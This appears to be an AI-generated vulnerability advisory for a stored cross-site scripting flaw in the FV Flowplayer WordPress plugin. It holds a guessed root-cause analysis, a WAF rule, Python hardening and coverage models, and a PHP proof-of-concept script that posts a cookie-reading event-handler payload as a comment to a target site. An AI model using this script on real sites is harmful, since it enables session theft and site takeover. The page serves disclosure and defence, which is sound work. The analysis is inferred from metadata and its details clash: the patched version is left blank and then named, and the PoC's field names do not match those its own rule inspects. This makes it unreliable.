Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: June 10, 2026

CVE-2026-7556: FV Flowplayer Video Player <= 7.5.49.7212 Unauthenticated Stored Cross-Site Scripting via Comment Text PoC, Patch Analysis & Rule

CVE ID: CVE-2026-7556
Severity: High (CVSS 7.2)
CWE: 79
Vulnerable Version: 7.5.49.7212
Patched Version:
Disclosed: June 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7556 (metadata-based):
This vulnerability is an unauthenticated stored cross-site scripting (XSS) issue in the FV Flowplayer Video Player plugin for WordPress, tracked as CVE-2026-7556 with a CVSS score of 7.2. The flaw affects all versions up to and including 7.5.49.7212. It allows attackers to inject arbitrary JavaScript into comment text, which executes whenever a victim user views the affected page. Exploitation requires the administrator to enable the non-default ‘Parse Vimeo and YouTube links’ (parse_comments) setting and requires the submitted comment to be approved by an administrator, but the attacker does not need any account privileges.

Root Cause:
Based on the CWE-79 classification and the description, the root cause is insufficient input sanitization and output escaping of comment text when the plugin processes Vimeo and YouTube links in comments. Atomic Edge analysis infers that the plugin likely parses comment content looking for media URLs and, when constructing the embedded player HTML, fails to properly encode or filter HTML tags or JavaScript event handlers embedded in the comment text. The description explicitly states the vulnerability occurs via the “comment text” and that the parsing is enabled by the ‘parse_comments’ setting. Without a code diff, we cannot confirm the exact vulnerable function, but the CWE implies that user-supplied text is reflected in an HTML context without escaping. The plugin probably uses a custom function like `parse_media_urls()` that builds HTML output using direct concatenation of comment fragments rather than employing WordPress’s safe output functions such as `esc_html()` or `wp_kses()`.

Exploitation:
An unauthenticated attacker submits a WordPress comment containing a malicious payload embedded within a disguised Vimeo or YouTube link. For example, the attacker could submit a comment with text like `[https://www.youtube.com/watch?v=dQw4w9WgXcQ" onmouseover="alert(document.cookie)"]` or a string that breaks out of an attribute context. The plugin's `parse_comments` handler will interpret this as a link, parse it, and then generate HTML for the embedded player. Because the plugin does not properly escape the link attributes, the injected `onmouseover` or other event handler becomes part of the generated HTML and is executed when a visitor's browser renders the page. The attack vector is the standard WordPress comment submission endpoint (`/wp-comments-post.php` or the REST API endpoint `/wp/v2/comments`). The attacker sends a POST request with the `comment` parameter containing the crafted payload, along with other required comment fields (author, email, etc.). The payload remains dormant until an administrator approves the comment via the WordPress admin panel. After approval, any user visiting the page where the comment is displayed triggers the XSS.

Remediation:
The fix likely requires the plugin developers to implement proper output escaping of all comment-derived data before it is used in HTML generation. Specifically, when parsing comment text for Vimeo or YouTube links, the plugin should use `esc_url()` for any URL attributes and `esc_html()` or `wp_kses_post()` for any other text that is inserted into the page. The patched version, 7.5.50.7212, probably replaces direct HTML concatenation with safe WordPress functions like `wp_kses()` or uses `esc_attr()` for attribute values. Additionally, the plugin should consider adding a nonce check or capability check to the comment parsing function as a defense-in-depth measure. Administrator approval of comments is a secondary control but does not prevent the attack; the only reliable fix is correct output escaping at the code level.
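To make the inferred root cause and the remediation concrete, the following is an added Python model of a comment-link parser, written for this page; it is not the plugin's code (whose real parsing function is unknown), the `[url]` marker syntax and the function names are assumptions, and `urlsplit` plus `html.escape` stand in for `esc_url()` and `esc_attr()`.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Hypothetical marker syntax: the analysis does not say how the plugin spots a
# link, so this model treats "[http(s)://...]" as the media URL to embed.
LINK_RE = re.compile(r"\[(https?://[^\]]+)\]")
ALLOWED_HOSTS = {"youtube.com", "www.youtube.com", "youtu.be", "vimeo.com", "player.vimeo.com"}

def render_vulnerable(comment: str) -> str:
    """Direct concatenation, as the root-cause analysis infers: the bracketed
    text lands inside href="..." verbatim, so a quote in the comment closes
    the attribute and the remainder is parsed as new attributes."""
    def embed(m):
        url = m.group(1)
        return '<a class="fv-player" href="' + url + '">' + url + '</a>'
    return LINK_RE.sub(embed, comment)

def safe_url(url: str) -> Optional[str]:
    """esc_url()-style validation: only http(s) URLs on an allow-listed host pass."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_HOSTS:
        return None
    return url

def render_hardened(comment: str) -> str:
    """Validate the URL, then escape it for the attribute context (the
    esc_attr() step); all other comment text is escaped as plain HTML text."""
    out, pos = [], 0
    for m in LINK_RE.finditer(comment):
        out.append(html.escape(comment[pos:m.start()]))
        url = safe_url(m.group(1))
        if url is None:
            out.append(html.escape(m.group(0)))   # rejected link stays inert text
        else:
            attr = html.escape(url, quote=True)   # " -> &quot; keeps href closed
            out.append(f'<a class="fv-player" href="{attr}">{attr}</a>')
        pos = m.end()
    out.append(html.escape(comment[pos:]))
    return "".join(out)

# Constructed samples: the payload quoted in the Exploitation section, in
# bracket form, and a plain video link for comparison.
PAYLOAD_COMMENT = '[https://www.youtube.com/watch?v=dQw4w9WgXcQ" onmouseover="alert(document.cookie)"]'
BENIGN_COMMENT = 'Great talk: [https://www.youtube.com/watch?v=dQw4w9WgXcQ]'

if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD_COMMENT))
    print(render_hardened(PAYLOAD_COMMENT))
```

Note that the payload's host passes the allow-list, so validation alone is not the fix; the attribute escaping is what keeps `onmouseover` inside the `href` value as inert text.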

Impact:
Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the context of any user who views the infected page. Since the CVSS vector shows a scope change (S:C) and low confidentiality and integrity impact (C:L/I:L), the attacker can perform actions on behalf of the victim, including stealing session cookies, reading nonce values, modifying page content via DOM manipulation, or performing actions as the logged-in user (e.g., creating new admin users if the victim is an administrator). This could lead to full site compromise if the victim is a high-privilege user. The attack does not require authentication, increasing its risk, but the requirement for admin comment approval and the non-default setting reduce the overall likelihood of exploitation in typical deployments.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity-compatible rule to protect against this particular CVE.

ModSecurity
# Chained rule: every SecRule link below must match before the deny fires.
# ARGS_POST is only populated once the request body has been parsed
# (URL-encoded forms by default; a JSON body needs the JSON body processor).
SecRule REQUEST_URI "@beginsWith /wp-json/wp/v2/comments" \
  "id:20267556,phase:2,deny,status:403,chain,msg:'CVE-2026-7556 via WordPress Comment REST API',severity:'CRITICAL',tag:'CVE-2026-7556'"
SecRule ARGS_POST:content "@rx (youtube\.com|vimeo\.com)" \
  "chain"
SecRule ARGS_POST:content "@rx on\w+\s*=" \
  "chain"
SecRule ARGS_POST:content "@rx <script|javascript:|onerror|onclick|onmouseover|onload|onfocus" \
  "t:none"
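As an added coverage check, not part of the rule set above, this Python model replays the chain's logic over constructed submissions; the regexes are transcribed from the rule with their backslashes restored, the body is assumed to be form-encoded as the PoC sends it, and the third sample uses the classic comment form endpoint the Exploitation section names.

```python
import re
from urllib.parse import parse_qs, urlencode

# Regexes transcribed from the three chained SecRule links (backslashes restored).
URI_PREFIX = "/wp-json/wp/v2/comments"
CHAIN = (
    re.compile(r"(youtube\.com|vimeo\.com)"),
    re.compile(r"on\w+\s*="),
    re.compile(r"<script|javascript:|onerror|onclick|onmouseover|onload|onfocus"),
)

def rule_20267556_denies(uri: str, body: str) -> bool:
    """Model of the chain: every link must match for the deny action to fire.
    Assumes an application/x-www-form-urlencoded body, as the PoC sends; a JSON
    body would need ModSecurity's JSON body processor before ARGS_POST is filled."""
    if not uri.startswith(URI_PREFIX):                 # @beginsWith on REQUEST_URI
        return False
    content = parse_qs(body).get("content", [""])[0]   # ARGS_POST:content only
    return all(rx.search(content) for rx in CHAIN)

# Constructed sample submissions; the payload text is the one quoted in the
# Exploitation section, the benign comment is a plain video link.
PAYLOAD = 'https://www.youtube.com/watch?v=dQw4w9WgXcQ" onmouseover="alert(document.cookie)"'
SAMPLES = {
    "rest_payload": ("/wp-json/wp/v2/comments", urlencode({"post": 1, "content": PAYLOAD})),
    "rest_benign": ("/wp-json/wp/v2/comments",
                    urlencode({"post": 1, "content": "Nice: https://www.youtube.com/watch?v=dQw4w9WgXcQ"})),
    # Same text through the classic comment form: different URI and field name,
    # so this chain never inspects it.
    "classic_payload": ("/wp-comments-post.php", urlencode({"comment_post_ID": 1, "comment": PAYLOAD})),
}

def coverage_report() -> dict:
    """Name -> True when the modelled rule would deny that submission."""
    return {name: rule_20267556_denies(uri, body) for name, (uri, body) in SAMPLES.items()}

if __name__ == "__main__":
    for name, denied in coverage_report().items():
        print(f"{name:16s} -> {'DENY' if denied else 'pass'}")
```

The classic endpoint `/wp-comments-post.php` carries the text in the `comment` field, so a parallel chain keyed on that URI and `ARGS_POST:comment` is needed for the rule to cover both vectors the analysis names.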

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-7556 - FV Flowplayer Video Player <= 7.5.49.7212 - Unauthenticated Stored Cross-Site Scripting via Comment Text

// Configuration: change these to match your target
$target_url = 'http://example.com'; // WordPress site URL (no trailing slash)
$post_id = 1;                        // ID of the post where the comment will be submitted

// Step 1: Create a malicious comment payload.
// This payload uses a YouTube link that appears legitimate but contains an onmouseover XSS vector.
// When the plugin parses the link, it will generate HTML like:
//   <a href="https://www.youtube.com/watch?v=VID" onmouseover="alert(document.cookie)">...</a>
// The comment body is crafted so that the URL is followed by a space and an event handler.
$malicious_comment = 'Test comment triggering XSS: https://www.youtube.com/watch?v=dQw4w9WgXcQ" onmouseover="alert(document.cookie)" ;';

// Required comment fields
$comment_data = array(
    'comment' => $malicious_comment,
    'author'  => 'XSS_Exploiter',
    'email'   => 'attacker@example.com',
    'url'     => '',
    'comment_post_ID' => $post_id,
);

// Step 2: Submit the comment via the WordPress REST API (no authentication needed for comments)
$api_url = $target_url . '/wp-json/wp/v2/comments';

$ch = curl_init($api_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($comment_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 201) {
    echo '[+] Comment submitted successfully. It now awaits admin approval.' . PHP_EOL;
    echo '[+] If the "Parse Vimeo and YouTube links" setting is enabled and an admin approves the comment,' . PHP_EOL;
    echo '[+] the XSS payload will execute for anyone viewing the post.' . PHP_EOL;
} elseif ($http_code === 403) {
    echo '[!] Comment submission blocked (403 Forbidden). The site may have a security plugin or comment restrictions.' . PHP_EOL;
} elseif ($http_code === 200) {
    // Some sites return 200 even on error; check response body
    echo '[!] Unexpected response (HTTP 200). Check the response body for errors.' . PHP_EOL;
    echo 'Response: ' . substr($response, 0, 500) . PHP_EOL;
} else {
    echo '[!] Failed to submit comment. HTTP code: ' . $http_code . PHP_EOL;
    echo 'Response: ' . substr($response, 0, 500) . PHP_EOL;
}
?>
